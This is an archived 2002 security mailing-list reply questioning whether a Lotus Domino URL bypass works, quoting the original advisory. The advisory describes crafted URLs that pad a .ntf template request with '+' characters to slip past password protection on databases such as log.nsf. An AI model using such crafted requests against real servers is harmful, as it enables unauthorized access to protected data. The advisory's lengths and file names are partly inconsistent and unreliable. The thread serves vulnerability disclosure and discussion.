Antwort: Lotus Domino url bypass

• Previous message: HarryM: "Re: Reported Kazaa and Morpheus vulnerabilities"
• Next in thread: CT: "Re: Antwort: Lotus Domino url bypass"
• Reply: CT: "Re: Antwort: Lotus Domino url bypass"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Hi,

this does not work for me. I tested it against Domino 5.0.8 on Windows 
2000 SP2 with all actual patches. I get redirected to the login-page. How 
are your ACLs on the template? Mine do not allow Anonymous or Default any 
access. Maybe this corrects the issue. I also use SSL to connect, but this 
should not interfere with the exploit. Maybe you should state version and 
platform.

Kind regards,

Jens Mickerts





"Gabriel A. Maggiotti" <gmaggiotat_private>
Gesendet von: gabiat_private
04.02.2002 04:30
Bitte antworten an gmaggiot

 
        An:     vuln-devat_private, bugtraqat_private
        Kopie: 
        Thema:  Lotus Domino url bypass



---------------------------------------------------------------------------
Web:  http://qb0x.net                                                 Author: Gabriel A. 
Maggiotti
X-te: Febrary 03, 2002                                           E-mail: 
gmaggiotat_private
---------------------------------------------------------------------------


General Info
------------
Problem Type             :  password protected url bypass
Product                          :  Lotus Domino
Scope                            :  Remote
Risk                             :  High


Summary
-------
A security vulnerability has been found in the popular Lotus Domino Web 
server.
Lotus Domino have files like webadmin.nsf, log.nsf and names.nfs,  this 
files 
are protected by password.  I discover that is posible to bypass this 
password 
if you create a malformed url.

Notes Databases '.nsf' like webadmin.nsf or log.nsf are store in 
"lotus/domino/
data/" directory nas Notes Templatesi '.ntf' are store in the same  place 
(Here
is the goal).


Examples:

I found a critical and max length.

assuming the buffer is:                          http://host.com/>/

Critical buffer length: is the minimun buffer   length you need  to bypass 
the 
passwd file.

normal url:              http://host.com/log.nsf                 <----           Request for a passwd
modify url:              http://host.com/log.ntf>.snf/
                                                                 |-----217 
-------|

In the case of log.nsf, <buff> is 217 - 12 = 205 '+' and the url will be:

http://host.com/log.ntf++++++++++++++++++++.nsf/
                                        |-------- 205 -----| 


If you write a buffer between 219 and 257(higher buffer), you bypass the 
passwd.
modify url:     http://host.com/log.ntf>.snf/
                                |---219 to 257 --|

• Next message: Nicolas Gregoire: "Re: Lotus Domino url bypass"
• Previous message: HarryM: "Re: Reported Kazaa and Morpheus vulnerabilities"
• Next in thread: CT: "Re: Antwort: Lotus Domino url bypass"
• Reply: CT: "Re: Antwort: Lotus Domino url bypass"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Mon Feb 04 2002 - 09:45:27 PST